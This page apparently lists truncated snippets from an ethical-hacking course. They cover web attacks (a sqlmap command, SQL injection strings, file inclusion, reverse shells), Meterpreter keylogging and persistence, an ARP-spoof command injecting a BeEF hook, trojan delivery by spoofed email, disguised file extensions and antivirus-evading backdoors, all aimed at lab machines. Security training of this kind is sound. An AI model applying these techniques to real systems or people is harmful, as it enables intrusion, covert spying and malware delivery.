More articles related to "Ethical Hacking - Overview"

Hacking is gaining unauthorized access to anything. Preparation Setting up a lab and installing needed applications and operating systems. Basics about computers and Linux systems. Network Pentesting Test the security of networks and computers connect…
Ethical Hacking Tutorials Free Ethical Hacking Tutorials https://www.guru99.com/ethical-hacking-tutorials.html Types of Hackers Ethical Hacker (White hat) Cracker (Black hat) Grey hat Script kiddies Hacktivist Phreaker https://www.guru99.com/what-is-…
What is Hacking? Gaining unauthorized access. Hackers? 1.Black-hat Hackers 2.White-hat Hackers 3.Grey-hat Hackers WHAT IS A PROGRAM? A set of instructions to do a certain task or solve a problem.…
Cross-platform hacking All programs we wrote are pure Python programs. They do not rely on OS-specific resources. Result: They work on any OS with a Python interpreter. If packaged, they will work on any OS even if Python is NOT installed.…
OWASP ZAP (Zed Attack Proxy) Automatically finds vulnerabilities in web applications. Free and easy to use. It can also be used for manual testing. This is the welcome page. Options Page Scan Policy Setting Page. Attack this target URL http://10.0.0.24…
XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject JavaScript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/Stored XSS 2.…
SQL INJECTION Preventing SQLi Filters can be bypassed. Use a blacklist of commands? Still can be bypassed. Use whitelist? Same issue. -> Use parameterized statements, separate data from SQL code. <?php //$textbox1 = admin' union select # Select * fr…
SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...etc. >sqlmap --help >sqlmap -u [target URL] Following are examples: sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&…
SQL INJECTION Discovering SQLi in GET Inject by browser URL. Selecting Data From Database Change the number to a big one, then you can get a useful error message. And you can try different numbers to find the right column. Using “union select 1,2,3,4,…
SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data is stored in it (usernames, passwords, etc.). The web application reads, updates and inserts data in the database. Interaction with the DB is done using SQL. WHY ARE THEY SO DANGEROUS…
VULNS MITIGATION 1. File Upload Vulns - Only allow safe files to be uploaded. 2. Code Execution Vulns: Don't use dangerous functions. Filter user input before execution. 3. File inclusion: Disable allow_url_fopen & allow_url_include. Use static file in…
REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ANY server. Execute PHP files from other servers on the current server. Store PHP files on other servers as .txt. Pre-Condition: Set allow_url_include…
LOCAL FILE INCLUSION Allows an attacker to read ANY file on the same server. Access files outside the www directory. Try to read the /etc/passwd file. 1. We know the current file path from the following error. 2. Try to visit the following URL: http://10.0.0.24…
CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be used to get a reverse shell. Or upload any file using the wget command. Code execution commands are attached in the resources. The following examples assume the…
EXPLOITATION - File Upload VULNS Simple type of vulnerability. Allow users to upload executable files such as PHP. Upload a PHP shell or backdoor, e.g. weevely 1. Generate backdoor: weevely generate [password] [file name] 2. Upload the generated file. 3.…
INFORMATION GATHERING IP address. Domain name info. Technologies used. Other websites on the same server. DNS records. Unlisted files, sub-domains, directories. 1. Whois Lookup - Find info about the owner of the target. -> http://whois.domaintools…
How to hack a website? An application installed on a computer. -> web application pen-testing. A computer uses an OS + other applications -> server-side attacks. Managed by humans -> client-side attacks. Target: Metasploitable VM…
PIVOTING Use the hacked device as a pivot. Try to gain access to other devices in the network. Tool: Metasploit - AUTOROUTE Module Target: Metasploitable VM Set up a route between hacker and hacked device. Gives hacker access to devices on the networ…
Spying - Capturing Keystrokes & Taking Screenshots Log all mouse/keyboard events > keyscan_start - show current working directory > keyscan_dump - lists files in the current working directory. > keyscan_stop changes working directory to [lo…
MAINTAINING ACCESS - Methods 1. Using veil-evasion Rev_http_service Rev_tcp_service Use it instead of a normal backdoor. Or upload and execute from meterpreter. Does not always work. 2. Using the persistence module run persistence -h Detectable by anti…
METERPRETER BASICS >help - shows help >background - backgrounds the current session >sessions -l - lists all sessions >sessions -i - interact with a certain session >sysinfo - displays system info. >ipconfig - displays info about interfaces.…
CLIENT SIDE ATTACKS - Detecting Trojans manually or using a sandbox Analyzing trojans Check the properties of the file. The file type of a trojan is application (.exe), even if it looks like a jpg, PDF or other file. Is it what it seems to be? Check Net…
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000…
CLIENT SIDE ATTACKS - BeEF Framework Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook URL. DNS spoof requests to a page containing the hook. Inject the hook in brows…
CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contact targets. (e.g. Maltego, Google, etc.) Send an email pretending to be a friend. Online Tool: https://anonymousemail.me/ Ask them to open a link, downl…
CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a suitable one. Make the trojan look even more trustworthy. We will use an old trick using the "right-to-left override" character. 1. Open up the character…
Client-Side Attacks - Social Engineering Tool: TheFatRat Just like Veil, it generates undetectable Metasploit backdoors. Uses a different method to evade AV programs. Generates executable binary backdoors for: Windows, Mac OS, Linux, Android. Install a…
CLIENT SIDE ATTACKS Backdooring ANY file Combine a backdoor with any file - generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original (pdf, jpg, mp3) file to…
CLIENT SIDE ATTACKS - Backdooring exe's Download an executable file first. VEIL - FRAMEWORK A backdoor is a file that gives us full control over the machine it gets executed on. Backdoors can be caught by Anti-Virus programs. Veil is a framewor…
CLIENT SIDE ATTACKS - Social Engineering Social Engineering Information gathering Tool: Maltego Gathering information about the target's Facebook account, Twitter account (friends, followers...), email, phone number, etc.…